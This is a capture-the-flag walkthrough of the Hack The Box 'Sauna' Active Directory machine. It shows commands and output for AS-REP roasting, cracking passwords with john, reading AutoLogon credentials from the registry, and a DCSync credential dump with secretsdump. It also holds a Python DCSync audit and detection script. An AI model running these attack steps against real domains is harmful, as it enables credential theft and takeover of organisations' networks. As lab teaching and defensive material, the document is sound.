Quick Summary
A fun Windows box with Active Directory on it. The website on port 80 gives away some employee names on its about-us page. I brute-forced web directories as I always do during web enumeration, but found nothing; enum4linux then gave me the domain name. Using GetNPUsers I dumped the AS-REP hash of a user whose account does not require Kerberos pre-authentication, cracked it with john, and grabbed user.txt. For privilege escalation I ran WinPEAS to look for credentials and misconfigurations and found AutoLogon credentials for a second account. That account holds DCSync rights on the domain, so I pulled the Administrator hash with secretsdump, logged in with psexec using pass-the-hash, and finally grabbed root.txt.
Penetration Testing Methodologies
Network Scanning
- Nmap scan
- discover open ports and what services are running
Enumeration
- visit the website looking for possible hints
- found some possible usernames on the about-us page
User Enumeration
- brute force web directories with dirsearch
- enumerate the Windows box with enum4linux to get some juicy information
- list all the candidate users in a text file, with name variations
Exploitation
- check whether any of those users has Kerberos pre-authentication disabled and perform an AS-REP roast attack
- using GetNPUsers I managed to dump the user's AS-REP hash, with the username in it
- crack the hash with john
- log in as FSmith with evil-winrm and grab user.txt
Privilege Escalation
- upload WinPEAS and run it to find some juicy info that I can use for privilege escalation
- found another credential: AutoLogon
- log in again, as svc_loanmgr, using evil-winrm
- svc_loanmgr has the DS-Replication-Get-Changes-All (GetChangesAll) right, so we can perform a DCSync attack
- grab the Administrator password hash with secretsdump
- log in as Administrator using psexec and finally grab root.txt
Walkthrough
Network Scanning
I always begin with nmap to see which services are running. I always use:
- -sV: probe open ports to determine service/version info
- -sC: equivalent to --script=default
- -A: aggressive scan (OS detection, version detection, default scripts and traceroute, so it already implies -sV and -sC)
- -T4: faster timing template
- -oN: save the scan results to a text file
root in htb/boxes/Sauna ❯ nmap -sV -sC -T4 -A 10.10.10.175 -oN nmap-Sauna
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-21 07:17 PST
Nmap scan report for 10.10.10.175
Host is up (0.21s latency).
Not shown: 988 filtered ports
PORT     STATE SERVICE       VERSION
53/tcp   open  domain?
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version
|_    bind
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-03-21 06:21:01Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=3/21%Time=5E754F50%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 7h02m24s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2020-03-21T06:23:55
|_  start_date: N/A

TRACEROUTE (using port 135/tcp)
HOP RTT       ADDRESS
1   211.01 ms 10.10.14.1
2   50.45 ms  10.10.10.175

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 395.18 seconds
root in htb/boxes/Sauna took 6m35s ❯
Nmap results
So there are a lot of open ports. Only three of them matter for this box:
- 80: a web service (IIS 10.0)
- 88: Kerberos, which together with LDAP on 389/3268 tells us this host is a domain controller, and the LDAP banner gives the DNS domain name EGOTISTICAL-BANK.LOCAL
- 5985: WinRM. It is not in the output above because it is outside nmap's default top-1000 ports (the scan covered 1000 ports, 988 filtered plus the 12 listed); a full port scan with -p- is needed to see it.
Two more details from the output are worth keeping in mind. SMB signing is enabled and required, so NTLM relay against this host is not an option. And the clock skew of about seven hours means that anything which authenticates with Kerberos tickets will fail (the KDC rejects requests more than five minutes off its clock) until the local clock is synced to the target, for example with ntpdate or faketime.
Enumeration
The Sauna Website
Since there is a web service, I always look at that first.
On the website I found a possible list of users on the about-us page.
User Enumeration
Enumerating users
I did not find anything else on the website, so I brute-forced the web directories like I always do during web enumeration:
root in htb/boxes/Sauna ❯ python3 /opt/dirsearch/dirsearch.py -u "http://10.10.10.175/" -e asd -t 20 --simple-report=sauna-directories

 _|. _ _  _  _  _ _|_    v0.3.9
(_||| _) (/_(_|| (_| )

Extensions: asd | HTTP method: get | Threads: 20 | Wordlist size: 6109

Error Log: /opt/dirsearch/logs/errors-20-03-21_07-40-57.log

Target: http://10.10.10.175/

[07:40:59] Starting:
[07:41:00] 403 -  312B  - /%2e%2e/google.com
[07:41:52] 301 -  147B  - /css  ->  http://10.10.10.175/css/
[07:42:08] 301 -  149B  - /fonts  ->  http://10.10.10.175/fonts/
[07:42:18] 301 -  150B  - /images  ->  http://10.10.10.175/images/
[07:42:18] 301 -  150B  - /Images  ->  http://10.10.10.175/Images/
[07:42:19] 200 -   32KB - /index.html

Task Completed
root in htb/boxes/Sauna took 2m15s ❯
Nothing useful again, so I used enum4linux to pull whatever the box gives away to an anonymous SMB/RPC session:
root in htb/boxes/Sauna ❯ enum4linux 10.10.10.175
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Mar 21 08:02:10 2020

 ==========================
|    Target Information    |
 ==========================
Target ........... 10.10.10.175
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

 ====================================================
|    Enumerating Workgroup/Domain on 10.10.10.175    |
 ====================================================
[E] Can't find workgroup/domain

 ============================================
|    Nbtstat Information for 10.10.10.175    |
 ============================================
Looking up status of 10.10.10.175
No reply from 10.10.10.175

 =====================================
|    Session Check on 10.10.10.175    |
 =====================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 437.
[+] Server 10.10.10.175 allows sessions using username '', password ''
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 451.
[+] Got domain/workgroup name:

 ===========================================
|    Getting domain SID for 10.10.10.175    |
 ===========================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 359.
Domain Name: EGOTISTICALBANK
Domain Sid: S-1-5-21-2966785786-3096785034-1186376766
[+] Host is part of a domain (not a workgroup)

 ======================================
|    OS information on 10.10.10.175    |
 ======================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 458.
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 10.10.10.175 from smbclient:
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 467.
[+] Got OS info for 10.10.10.175 from srvinfo:
Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED

 =============================
|    Users on 10.10.10.175    |
 =============================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 866.
[E] Couldn't find users using querydispinfo: NT_STATUS_ACCESS_DENIED

Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 881.
[E] Couldn't find users using enumdomusers: NT_STATUS_ACCESS_DENIED

 =========================================
|    Share Enumeration on 10.10.10.175    |
 =========================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 640.

	Sharename       Type      Comment
	---------       ----      -------
SMB1 disabled -- no workgroup available

[+] Attempting to map shares on 10.10.10.175

 ====================================================
|    Password Policy Information for 10.10.10.175    |
 ====================================================
[E] Unexpected error from polenum:

[+] Attaching to 10.10.10.175 using a NULL share

[+] Trying protocol 139/SMB...

	[!] Protocol failed: Cannot request session (Called Name:10.10.10.175)

[+] Trying protocol 445/SMB...

	[!] Protocol failed: SAMR SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.

Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 501.

[E] Failed to get password policy with rpcclient

 ==============================
|    Groups on 10.10.10.175    |
 ==============================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 542.

[+] Getting builtin groups:

[+] Getting builtin group memberships:
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 542.

[+] Getting local groups:

[+] Getting local group memberships:
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 593.

[+] Getting domain groups:

[+] Getting domain group memberships:

 =======================================================================
|    Users on 10.10.10.175 via RID cycling (RIDS: 500-550,1000-1050)    |
 =======================================================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 710.
[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED.  RID cycling not possible.
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 742.

 =============================================
|    Getting printer info for 10.10.10.175    |
 =============================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 991.
Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED

enum4linux complete on Sat Mar 21 08:03:39 2020

root in htb/boxes/Sauna took 1m29s ❯
Based on that output, the box is a Kerberos KDC and the NetBIOS domain name is EGOTISTICALBANK (the LDAP banner from nmap gives the DNS name, EGOTISTICAL-BANK.LOCAL, which is the realm the Kerberos tools will need). Anonymous SMB gave nothing else: user listing, RID cycling and the password policy all came back NT_STATUS_ACCESS_DENIED, so I cannot read the real usernames from the DC. Instead I put the names from the about-us page into a text file with several naming-convention variations for each, since I do not know the company's username format yet:
Fergus.Smith
Fergus.a.Smith
FSmith
fsmith
FaSmith
FeSmith
FeaSmith
Hugo.Bear
Hugo.a.Bear
HBear
HaBear
HuBear
HuaBear
Steven.Kerb
Steven.a.Kerb
SKerb
SaKerb
StKerb
StaKerb
Shaun.Coins
Shaun.a.Coins
SCoins
SaCoins
ShCoins
ShaCoins
Bowie.Taylor
Bowie.a.Taylor
BTaylor
BaTaylor
BoTaylor
BoaTaylor
Sophie.Driver
Sophie.a.Driver
SDriver
SaDriver
SoDriver
SoaDriver
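Writing that list by hand does not scale past half a dozen names, so here is a small generator for it. This is an added example and not code from the writeup: it takes the display names from the about-us page (the only input the page provides), produces the variants the list above uses, and goes a bit further by adding the other username formats commonly found in AD (first_last, firstlast, LastF and so on). Everything else in it is my own assumption, including the "a" middle initial the writeup guesses.

```python
# Added example (not from the original writeup): turn "First Last" display names
# scraped from a company page into candidate sAMAccountNames for GetNPUsers -usersfile.
# The six names below are the ones on Sauna's about-us page; the variant set is the
# writeup's plus the other conventions commonly seen in AD.

def username_variations(full_name):
    """Candidate usernames for one 'First Last' display name."""
    parts = full_name.split()
    first, last = parts[0], parts[-1]
    f, fi = first[0], first[:2]
    cands = [
        # the writeup's own guesses ("a" is an assumed middle initial)
        f"{first}.{last}", f"{first}.a.{last}",
        f"{f}{last}", f"{fi}{last}", f"{f}a{last}", f"{fi}a{last}",
        # other formats commonly used for AD accounts
        f"{first}{last}", f"{first}_{last}", f"{first}-{last}",
        f"{last}{f}", f"{last}.{first}", f"{f}.{last}", first, last,
    ]
    # AD resolves sAMAccountNames case-insensitively, so one spelling per
    # variant is enough; keep first-seen spelling, drop case duplicates.
    seen, out = set(), []
    for c in cands:
        if c.lower() not in seen:
            seen.add(c.lower())
            out.append(c)
    return out

def build_userlist(names):
    """Flatten variations for every name, preserving order, no duplicates."""
    seen, out = set(), []
    for name in names:
        for c in username_variations(name):
            if c.lower() not in seen:
                seen.add(c.lower())
                out.append(c)
    return out

# Constructed input: the employee names listed on the about-us page.
ABOUT_US_NAMES = ["Fergus Smith", "Hugo Bear", "Steven Kerb",
                  "Shaun Coins", "Bowie Taylor", "Sophie Driver"]

if __name__ == "__main__":
    # Redirect to users.txt and feed it to GetNPUsers -usersfile.
    print("\n".join(build_userlist(ABOUT_US_NAMES)))
```

Each name still produces only a dozen or so candidates, which is cheap: one AS-REQ per candidate, and the KDC answers KDC_ERR_C_PRINCIPAL_UNKNOWN for the ones that do not exist.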
Exploitation
Kerberos Pre-Authentication
Now that I have a list of candidate users, the next thing to do is to check whether any of them has Kerberos pre-authentication disabled (the UF_DONT_REQUIRE_PREAUTH flag on the account) and perform an AS-REP roast attack. Normally the client has to prove it knows the password before the KDC answers an AS-REQ; when pre-authentication is not required, the KDC sends the AS-REP to anyone who asks for that user, and part of that reply is encrypted with a key derived from the user's password, so it can be cracked offline. I will grab the AS-REPs with GetNPUsers.py, giving it the DNS domain name from the LDAP banner as the realm:
root in htb/boxes/Sauna via python v2.7.17 ❯ python GetNPUsers.py egotistical-bank.local/ -usersfile users.txt -outputfile result.txt -dc-ip 10.10.10.175
Impacket v0.9.21.dev1+20200305.180336.e0c1b9dd - Copyright 2020 SecureAuth Corporation

[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[... the same error is repeated for every other name in users.txt that does not exist in the domain ...]
root in htb/boxes/Sauna via python v2.7.17 took 24s ❯ ls
GetNPUsers.py  nmap-Sauna  payaso.py  result.txt  sauna-directories  users.txt
Looking at the result file, user FSmith has pre-authentication disabled and I got his AS-REP hash. There are two entries because both the FSmith and fsmith spellings were in the list and the KDC resolves account names case-insensitively, so they are the same account. All the other candidates came back KDC_ERR_C_PRINCIPAL_UNKNOWN, which is useful in itself: that error means the name does not exist in the domain, so the same request doubles as a username-enumeration oracle.
root in htb/boxes/Sauna via python v2.7.17 ❯ cat result.txt
$krb5asrep$23$FSmith@EGOTISTICAL-BANK.LOCAL:8495bdf34711fd79334bb5c80d64fb42$…
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:fa1c6693421661b8cf10a966cf45ff47$…
root in htb/boxes/Sauna via python v2.7.17 ❯
Now that I have the hash it is time to crack it with john. The "23" in the hash line is the Kerberos encryption type (RC4-HMAC), whose key is simply the NT hash of the password, which is why john can try candidates so quickly:
root in htb/boxes/Sauna via python v2.7.17 ❯ john result.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Thestrokes23     ($krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL)
Thestrokes23     ($krb5asrep$23$FSmith@EGOTISTICAL-BANK.LOCAL)
2g 0:00:00:58 DONE (2020-03-21 08:43) 0.03437g/s 181144p/s 362289c/s 362289C/s Thrall..Thehunter22
Use the "--show" option to display all of the cracked passwords reliably
Session completed
root in htb/boxes/Sauna via python v2.7.17 took 59s ❯
Grab user.txt
I have FSmith's password, Thestrokes23, so now it is time to use evil-winrm, log in as FSmith over WinRM and grab user.txt:
root in evil-winrm on master via ruby v2.5.7 ❯ ruby evil-winrm.rb -i 10.10.10.175 -u FSmith -p Thestrokes23

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\FSmith\Documents> whoami
egotisticalbank\fsmith
*Evil-WinRM* PS C:\Users\FSmith\Documents> cd ..
*Evil-WinRM* PS C:\Users\FSmith> cd Desktop
*Evil-WinRM* PS C:\Users\FSmith\Desktop> ls

    Directory: C:\Users\FSmith\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        1/23/2020  10:03 AM             34 user.txt

*Evil-WinRM* PS C:\Users\FSmith\Desktop> more user.txt
20b98d97
*Evil-WinRM* PS C:\Users\FSmith\Desktop>
Privilege Escalation
Escalating to svc_loanmgr
While enumerating the box I found another user, svc_loanmgr:
*Evil-WinRM* PS C:\users> ls

    Directory: C:\users

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        1/25/2020   1:05 PM                Administrator
d-----        1/23/2020   9:52 AM                FSmith
d-r---        1/22/2020   9:32 PM                Public
d-----        1/24/2020   4:05 PM                svc_loanmgr
I need to get to svc_loanmgr but I do not know what to do next, so I uploaded and ran WinPEAS. It found AutoLogon credentials in plain text:
[+] Looking for AutoLogon credentials(T1012)
Some AutoLogon credentials were found!!
DefaultDomainName             :  EGOTISTICALBANK
DefaultUserName               :  EGOTISTICALBANK\svc_loanmanager
DefaultPassword               :  Moneymakestheworldgoround!

So the password is Moneymakestheworldgoround!. Note that the stored username is svc_loanmanager, while the account that actually exists on the box is svc_loanmgr; the password works for svc_loanmgr anyway. We can get the same value without WinPEAS by searching HKLM for REG_SZ values that mention "password"; the hit that matters is DefaultPassword under Winlogon, which Windows reads at boot to log that account on automatically, and which any local user can read because HKLM\SOFTWARE is world-readable. (The Sysinternals Autologon tool avoids this by storing the password as an LSA secret instead, which needs SYSTEM-level access to recover.)
*Evil-WinRM* PS C:\Users\FSmith\Desktop> reg query HKLM /f password /t REG_SZ /s

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\XWizards\Components\{29EA1611-529B-4113-8EE3-EE0F6DD2C715}
    (Default)    REG_SZ    RASGCW Change Password Page

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\XWizards\Components\{3bfe6eb7-281d-4333-999e-e949e3621de7}
    (Default)    REG_SZ    Cert Password UI Page

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\XWizards\Components\{9cb233a5-a4a5-46b9-ab13-db07ce949410}
    (Default)    REG_SZ    Password retry UI Page

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\XWizards\Components\{d9162b5b-ca81-476e-a310-cb32d932733c}
    (Default)    REG_SZ    Password Expired UI Page

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    DefaultPassword    REG_SZ    Moneymakestheworldgoround!

HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Capabilities\Roaming\FormSuggest
    FilterIn    REG_SZ    FormSuggest Passwords,Use FormSuggest,FormSuggest PW Ask

HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers\{2135f72a-90b5-4ed3-a7f1-8bb705ac276a}
    (Default)    REG_SZ    PicturePasswordLogonProvider

HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers\{60b78e88-ead8-445c-9cfd-0b87f74ea6cd}
    (Default)    REG_SZ    PasswordProvider

HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\SO\AUTH\LOGON\ASK
    Text    REG_SZ    Prompt for user name and password
Login as svc_loanmgr
So from FSmith I now log in as svc_loanmgr (the AutoLogon entry says svc_loanmanager, but svc_loanmgr is the account that exists and the password is valid for it) and start enumerating again.
*Evil-WinRM* PS C:\Users\svc_loanmgr\Desktop> whoami /all

USER INFORMATION
----------------

User Name                   SID
=========================== ==============================================
egotisticalbank\svc_loanmgr S-1-5-21-2966785786-3096785034-1186376766-1108

GROUP INFORMATION
-----------------

Group Name                                  Type             SID          Attributes
=========================================== ================ ============ ==================================================
Everyone                                    Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users             Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.

*Evil-WinRM* PS C:\Users\svc_loanmgr>
Nothing interesting in the token: the groups and privileges are the defaults any authenticated domain user gets (SeMachineAccountPrivilege, for example, is granted to Authenticated Users on domain controllers out of the box). So I collected the domain with BloodHound to look at object ACLs instead:
BloodHound shows that svc_loanmgr holds the replication rights on the domain object, DS-Replication-Get-Changes and DS-Replication-Get-Changes-All (the GetChanges and GetChangesAll edges), which is the combination BloodHound draws as a DCSync edge. With both rights an account can ask the DC over DRSUAPI to replicate any account's secrets exactly as another domain controller would, so nothing has to run on the DC itself. I can abuse that with secretsdump's -just-dc option and pull the Administrator NT hash:
root in impacket/examples on master via python v2.7.17 ❯ python secretsdump.py EGOTISTICALBANK/svc_loanmgr@10.10.10.175 -just-dc
Impacket v0.9.21.dev1+20200305.180336.e0c1b9dd - Copyright 2020 SecureAuth Corporation

Password:
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:97d33cc179ece045b9dd8f8ecd61a944:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:987e26bb845e57df4c7301753f6cb53fcf993e1af692d08fd07de74f041bf031
Administrator:aes128-cts-hmac-sha1-96:145e4d0e4a6600b7ec0ece74997651d0
Administrator:des-cbc-md5:19d5f15d689b1ce5
krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24
krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9
krbtgt:des-cbc-md5:c170d5dc3edfc1d9
EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324
EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9
EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7
EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2
EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b
EGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76b
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2
SAUNA$:aes256-cts-hmac-sha1-96:c9d865558b9ce09f6589ed79a4f9354c128b168f5b1dfa5712cce47a741e7df2
SAUNA$:aes128-cts-hmac-sha1-96:72c6fee92ba584acb19a4a1d7d2e876c
SAUNA$:des-cbc-md5:da0794d52c5eab5e
[*] Cleaning up...
root in impacket/examples on master via python v2.7.17 took 51s ❯
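The BloodHound finding above boils down to two extended-right GUIDs in the domain object's DACL, and the same two GUIDs are what a defender sees in the Security log when DCSync actually runs. The following is an added example, not code from the writeup or from BloodHound or Impacket: audit_dcsync_rights() applies the "both replication rights, or GenericAll" rule to a list of ACEs and reports who can DCSync, and detect_dcsync_events() applies the matching detection to event 4662 records. The ACE list and the events are constructed samples in a simplified dict form, with svc_loanmgr and SAUNA$ used as the names; they are not output captured from the box.

```python
# Added example (not from the writeup): audit and detect DCSync rights.
# Extended-right GUIDs from the AD schema (the ones BloodHound maps to
# GetChanges / GetChangesAll). Both are needed to replicate secrets.
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
DCSYNC_RIGHTS = frozenset({DS_REPLICATION_GET_CHANGES, DS_REPLICATION_GET_CHANGES_ALL})

ADS_RIGHT_DS_CONTROL_ACCESS = 0x100       # grants the extended right named in object_type
ADS_RIGHT_GENERIC_ALL = 0x10000000        # covers every right, extended ones included

def audit_dcsync_rights(aces):
    """aces: allow ACEs from the domain object's DACL as dicts with keys
    trustee, access_mask, object_type (extended-right GUID, '' = all).
    Returns {trustee: 'DCSync' | 'partial'} for trustees holding any replication right."""
    held = {}
    for ace in aces:
        mask = ace["access_mask"]
        if mask & ADS_RIGHT_GENERIC_ALL:
            rights = set(DCSYNC_RIGHTS)
        elif mask & ADS_RIGHT_DS_CONTROL_ACCESS:
            guid = ace.get("object_type", "").lower()
            rights = set(DCSYNC_RIGHTS) if guid == "" else ({guid} & DCSYNC_RIGHTS)
        else:
            continue
        if rights:
            held.setdefault(ace["trustee"], set()).update(rights)
    # GetChanges alone (or GetChangesAll alone) is not enough to pull secrets.
    return {t: ("DCSync" if r == DCSYNC_RIGHTS else "partial") for t, r in held.items()}

def detect_dcsync_events(events, dc_accounts):
    """events: Security event 4662 records as dicts with keys event_id, subject,
    object_type, properties (the GUID list as logged). dc_accounts: machine
    accounts of real DCs, which replicate legitimately. Returns offending subjects."""
    hits = []
    for ev in events:
        if ev.get("event_id") != 4662:
            continue
        props = ev.get("properties", "").lower()
        if DS_REPLICATION_GET_CHANGES_ALL not in props and DS_REPLICATION_GET_CHANGES not in props:
            continue
        if ev["subject"] in dc_accounts:
            continue
        hits.append(ev["subject"])
    return hits

# Constructed sample DACL for DC=EGOTISTICAL-BANK,DC=LOCAL (not the real ACL).
SAMPLE_ACES = [
    {"trustee": "EGOTISTICALBANK\\Domain Admins", "access_mask": ADS_RIGHT_GENERIC_ALL, "object_type": ""},
    {"trustee": "EGOTISTICALBANK\\svc_loanmgr", "access_mask": ADS_RIGHT_DS_CONTROL_ACCESS,
     "object_type": DS_REPLICATION_GET_CHANGES},
    {"trustee": "EGOTISTICALBANK\\svc_loanmgr", "access_mask": ADS_RIGHT_DS_CONTROL_ACCESS,
     "object_type": DS_REPLICATION_GET_CHANGES_ALL},
    {"trustee": "EGOTISTICALBANK\\FSmith", "access_mask": ADS_RIGHT_DS_CONTROL_ACCESS,
     "object_type": DS_REPLICATION_GET_CHANGES},
    {"trustee": "EGOTISTICALBANK\\FSmith", "access_mask": 0x20010, "object_type": ""},  # read only
]

# Constructed sample 4662 events (not from the box's Security log).
BOTH = "{%s} {%s}" % (DS_REPLICATION_GET_CHANGES, DS_REPLICATION_GET_CHANGES_ALL)
SAMPLE_EVENTS = [
    {"event_id": 4662, "subject": "EGOTISTICALBANK\\SAUNA$", "object_type": "domainDNS", "properties": BOTH},
    {"event_id": 4662, "subject": "EGOTISTICALBANK\\svc_loanmgr", "object_type": "domainDNS", "properties": BOTH},
    {"event_id": 4662, "subject": "EGOTISTICALBANK\\FSmith", "object_type": "user", "properties": "Read Property"},
]

if __name__ == "__main__":
    print(audit_dcsync_rights(SAMPLE_ACES))
    print(detect_dcsync_events(SAMPLE_EVENTS, {"EGOTISTICALBANK\\SAUNA$"}))
```

The audit side is the fix: nothing outside Domain Controllers, Enterprise Domain Controllers and the built-in admin groups should hold both rights on the domain head, so any other trustee reported as "DCSync" is an escalation path like the one used here. The detection side only works if auditing is switched on: 4662 is emitted for the domain object only when the Directory Service Access subcategory is enabled and the object has a SACL entry for control access, and the event shows the GUIDs rather than friendly names, which is why the detector matches on them.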
